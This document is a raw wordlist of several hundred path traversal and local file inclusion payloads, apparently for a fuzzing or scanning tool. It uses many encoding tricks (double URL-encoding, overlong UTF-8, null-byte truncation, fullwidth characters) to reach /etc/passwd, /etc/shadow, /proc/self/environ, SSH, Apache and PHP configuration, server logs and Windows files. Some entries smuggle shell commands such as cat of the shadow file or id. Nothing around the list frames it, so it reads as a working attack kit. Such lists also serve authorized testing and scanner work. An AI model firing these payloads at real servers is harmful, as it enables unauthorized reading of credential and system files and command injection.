/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd.../../
..../../../
....\..\
....\..\..\
.../../../
.../../../../
...\..\
...\..\..\
...\..\..\..\
../../../../../../
../../../../../../../
../../../../../../../../
../../../../../../../../../
../../../../../../../../../../
../../../../../../../../../../../
../../../../../../../../../../../../
../../../../../../../../../../../../../
../../../../../../../../../../../../../../
../../../../../../../../../../../../../../../
..\..\..\..\..\..\
..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
././././
./././././
.\.\.\
.\.\.\.\.\
.\.\.\.\.\.\
/.../.../.../.../.../
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
.\.\.\.\
../../../../../../../bin/busybox
../../../../../../../../bin/more%20/etc/passwd
../../../../../../../../../../etc/ssh/sshd_config%00
../../../../../../../../../etc/ssh/sshd_config%00
../../../../../../../../bin/more%20/etc/shadow
../../../../../../../bin/sh
../../../../../../../../../proc/net/arp%00
../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
../../../../../../../../bin/more%20/proc/self/environ
../../../../../../../../../proc/net/route%00
../../../../../../../usr/bin/id
../../../../../../../../../../usr/local/etc/php.ini%00
../../../../../../../bin/ls
../../../../../../../../bin/more%20/proc/version
../../../../../../../../../proc/net/if_inet6%00
../../../../../../../../../../proc/self/cmdline%00
../../../../../../../../bin/more%20/etc/resolv.conf
../../../../../../../../../../etc/fstab%00
../../../../../../../../../proc/net/ip_tables_names%00
../../../../../../../usr/bin/whoami
../../../../../../../bin/cat
../../../../../../../../../proc/net/ipv4/netstat%00
../../../../../../../../usr/bin/cat%20/etc/passwd
../../../../../../../../../../usr/local/etc/apache/.htpasswd%00
../../../../../../../bin/netstat
../../../../../../../../../../etc/crontab%00
../../../../../../../../../proc/net/ipv6/netstat%00
../../../../../../../../usr/bin/cat%20/etc/shadow
../../../../../../../../../../etc/sysctl.conf%00
../../../../../../../../../proc/net/dev%00
../../../../../../../../usr/bin/cat%20/proc/self/environ
../../../../../../../usr/bin/w
../../../../../../../../../../etc/profile%00
../../../../../../../../../proc/net/tcp%00
../../../../../../../../usr/bin/cat%20/proc/version
../../../../../../../usr/bin/which
../../../../../../../../../../proc/cpuinfo%00
../../../../../../../../../proc/net/udp%00
../../../../../../../../usr/bin/cat%20/etc/resolv.conf
../../../../../../../usr/bin/uname
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/sys/net/ipv4/conf%00
../../../../../../../usr/bin/hostname
../../../../../../../../usr/bin/more%20/etc/passwd
../../../../../../../../../../usr/local/etc/apache/conf/ssl.conf%00
../../../../../../../proc/cpuinfo
../../../../../../../../../proc/sys/net/ipv4/route%00
../../../../../../../../usr/bin/more%20/etc/shadow
../../../../../../../../../../var/log/httpd/access_log%00
../../../../../../../proc/self/status
../../../../../../../../../proc/sys/net/ipv6/conf%00
../../../../../../../../usr/bin/more%20/proc/self/environ
../../../../../../../../../../var/log/httpd/error_log%00
..../../
../../../../../../../../../proc/sys/net/ipv6/route%00
../../../../../../../usr/bin/dirname
../../../../../../../../usr/bin/more%20/proc/version
../../../../../../../../../../var/log/syslog%00
../../../../../../../../../proc/sys/net/ipv4/tcp_max_syn_backlog%00
../../../../../../../usr/bin/hostid
../../../../../../../../usr/bin/more%20/etc/resolv.conf
../../../../../../../../../../var/log/mail.log%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
../../../../../../../../../proc/sys/net/ipv4/tcp_max_tw_buckets%00
../../../../../../../usr/bin/groups
../../../../../../../../var/log/messages
../../../../../../../../../../var/log/messages%00
../../../../../../../../../proc/sys/net/ipv4/tcp_rmem%00
../../../../../../../usr/bin/tac
../../../../../../../../../../var/log/secure%00
../../../../../../../../var/log/syslog
../../../../../../../../../proc/sys/net/ipv4/tcp_wmem%00
../../../../../../../usr/bin/ip
../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/cron%00
../../../../../../../../../../etc/security/access.conf%00
../../../../../../../../../proc/sys/net/ipv4/udp_mem%00
../../../../../../../usr/bin/nohup
../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../etc/security/limits.conf%00
../../../../../../../../../proc/sys/net/ipv4/udp_rmem_min%00
../../../../../../../usr/bin/lsof
../../../../../../../../var/log/apache/access.log
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
2.../../../../../../../../../../etc/passwd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2fapache2flogs2faccess.log
..2fapache2flogs2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
../../../../../../../../proc/self/environ
../../../../../../../proc/self/environ
../../../../../../../../../proc/self/environ%00
../../../../../../../../../proc/sys/net/ipv4/udp_wmem_min%00
../../../../../../../usr/bin/pwd
../../../../../../../../../../usr/local/etc/apache/conf/magic%00
../../../../../../../../var/log/apache/error.log
../../../../../../../../../proc/sys/net/ipv6/tcp_max_syn_backlog%00
../../../../../../../usr/bin/env
../../../../../../../../../../usr/local/apache/conf/httpd.conf%00
../../../../../../../../var/log/httpd/access_log
../../../../../../../../../proc/sys/net/ipv6/tcp_max_tw_buckets%00
../../../../../../../usr/bin/fuser
../../../../../../../../../../usr/local/etc/apache2/httpd.conf%00
../../../../../../../../var/log/httpd/error_log
../../../../../../../../../proc/sys/net/ipv6/tcp_rmem%00
../../../../../../../usr/bin/timeout
../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf%00
../../../../../../../../var/log/auth.log
../../../../../../../../../proc/sys/net/ipv6/tcp_wmem%00
../../../../../../../usr/bin/stty
../../../../../../../../../../usr/local/etc/apache2/conf.d/security%00
../../../../../../../../var/log/dmesg
../../../../../../../../../../etc/httpd/conf/httpd.conf%00
../../../../../../../../../proc/sys/net/ipv6/udp_mem%00
../../../../../../../usr/bin/cut
../../../../../../../../var/log/auth.log.1
../../../../../../../../../../etc/apache2/httpd.conf%00
../../../../../../../../../proc/sys/net/ipv6/udp_rmem_min%00
../../../../../../../usr/bin/head
../../../../../../../../var/log/lastlog
../../../../../../../../../../etc/apache2/conf/httpd.conf%00
../../../../../../../../../proc/sys/net/ipv6/udp_wmem_min%00
../../../../../../../usr/bin/tail
../../../../../../../../var/log/maillog
../../../../../../../../../../etc/apache2/conf.d/security%00
../../../../../../../../../proc/sys/kernel/core_pattern%00
../../../../../../../usr/bin/tr
../../../../../../../../var/log/secure
../../../../../../../../../proc/sys/kernel/core_uses_pid%00
../../../../../../../usr/bin/uniq
../../../../../../../../../../usr/local/etc/php5/php.ini%00
../../../../../../../../var/log/wtmp
../../../../../../../../../../boot.ini%00
=3Dâ/..â.â%2f..
../../../../../../../etc/hosts
../../../../../../../../../etc/shadow%00
../../../../../../../../proc/version
../../../../../../../../../../etc/php5/php.ini%00
../../../../../../../../../proc/sys/kernel/hostname%00
../../../../../../../usr/bin/wc
../../../../../../../../var/log/xferlog
../../../../../../../../../proc/sys/kernel/modprobe%00
../../../../../../../usr/bin/sort
../../../../../../../../../../usr/local/etc/php/php.ini%00
../../../../../../../../var/log/cron
../../../../../../../../../../etc/php/php.ini%00
../../../../../../../../../proc/sys/kernel/osrelease%00
../../../../../../../usr/bin/date
../../../../../../../../var/log/spooler
../../../../../../../../etc/hosts
../../../../../../../../../proc/sys/kernel/osversion%00
../../../../../../../usr/bin/grep
../../../../../../../../etc/hostname
../../../../../../../../../../etc/php.ini%00
../../../../../../../../../proc/sys/kernel/pid_max%00
../../../../../../../usr/bin/r
../../../../../../../../etc/issue
../../../../../../../../../proc/sys/kernel/printk%00
../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf%00
../../../../../../../../etc/syslog.conf
../../../../../../../../../proc/sys/kernel/random/boot_id%00
../../../../../../../../../../etc/httpd/conf.d/security%00
../../../../../../../../etc/sysctl.conf
../../../../../../../../../proc/sys/kernel/random/uuid%00
../../../../../../../../etc/services
../../../../../../../../../proc/sys/kernel/sysrq%00
../../../../../../../../../../usr/local/etc/apache/conf.d/security%00
../../../../../../../../etc/inetd.conf
../../../../../../../../../proc/sys/net/ipv4/ip_forward%00
../../../../../../../../../etc/hosts%00
../../../../../../../../etc/resolv.conf
../../../../../../../etc/shadow
../../../../../../../../../../proc/version%00
../../../../../../../../etc/profil
../../../../../../../../../proc/sys/net/ipv6/conf/default/forwarding%00
../../../../../../../../../../usr/local/etc/apache2/sites-enabled/000-default.conf%00
../../../../../../../../bin/cat%20/etc/passwd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
../../../../../../../../../etc/group%00
../../../../../../../etc/services
../../../../../../../../../../etc/shadow%00
../../../../../../../../bin/cat%20/etc/shadow
../../../../../../../etc/issue
../../../../../../../../../../etc/issue%00
../../../../../../../../../etc/issue%00
../../../../../../../../bin/cat%20/proc/self/environ
../../../../../../../etc/fstab
../../../../../../../../../../etc/hosts%00
../../../../../../../../../etc/services%00
../../../../../../../../bin/cat%20/proc/version
../../../../../../../etc/resolv.conf
../../../../../../../../../etc/resolv.conf%00
../../../../../../../../../../etc/services%00
../../../../../../../../bin/cat%20/etc/resolv.conf
../../../../../../../../../../etc/group%00
../../../../../../../../../etc/ssh/ssh_config%00
../../../../../../../proc/mounts
\â¦..\\\â¦..\\\â¦..\\\
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access.log
/apache2/logs/access_log
/apache2/logs/error.log
/apache2/logs/error_log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/access.log
/apache/logs/access_log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apache/logs/error.log
/apache/logs/error_log
/apache\php\php.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
/.bash_history
/.bash_profile
/.bashrc
./../../../../../../../bin/cat%20/etc/passwd
./../../../../../../../bin/cat%20/etc/resolv.conf
./../../../../../../../bin/cat%20/etc/shadow
./../../../../../../../bin/cat%20/proc/self/environ
./../../../../../../../bin/cat%20/proc/version
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
../../../../../../../../../../../../boot.ini
../../boot.ini
..//..//..//..//..//boot.ini
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/./././././././././././boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:/boot.ini
C:\boot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
../config.asp
/config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
../_config.php
../config.php
_config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:\ProgramFiles\
c:\ProgramFiles\ApacheGroup\Apache\logs\access.log
c:\ProgramFiles\ApacheGroup\Apache\logs\error.log
/.cshrc
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
d:\AppServ\MySQL
database.asp
database.js
database.php
data.php
dbase.phpa
db.php
../../../../../../../dev
/D:\ProgramFiles\
d:\System32\Inetsrv\metabase.xml
%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%e2%80%a5%ef%b9%a8%ef%bd%82%ef%bd%8f%ef%bd%8f%ef%bd%94%e2%80%a4%e2%85%b0%ef%bd%8e%e2%85%b0
%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%e2%80%a5%ef%bc%8f%ef%bd%85%ef%bd%94%e2%85%bd%ef%bc%8f%ef%bd%90%ef%bd%81%ef%bd%93%ef%bd%93%ef%bd%97%e2%85%be
..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8..%ef%b9%a8boot.ini
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bc..%ef%bc%bcboot.ini
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
./../../../../../../etc/fstab
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
./../../../../../../../../etc/group%00
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
../../../../../../../../../../../../etc/hosts
./../../../../../../etc/hosts
/etc/hosts
../../../../../../../../../../../../etc/hosts%00
./../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
../../../../../etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
./../../../../../../etc/issue
/etc/issue
./../../../../../../../../etc/issue%00
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//....//etc/passwd
....//....//....//....//....//....//etc/passwd
....//....//....//....//....//etc/passwd
....//....//....//....//etc/passwd
....//....//....//etc/passwd
....//....//etc/passwd
....//etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/....\/etc/passwd
....\/....\/....\/....\/etc/passwd
....\/....\/....\/etc/passwd
....\/....\/etc/passwd
....\/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
./../../../../../../../etc/passwd
./../../../../../../etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/./././././././././././etc/passwd
///////../../../etc/passwd
/etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
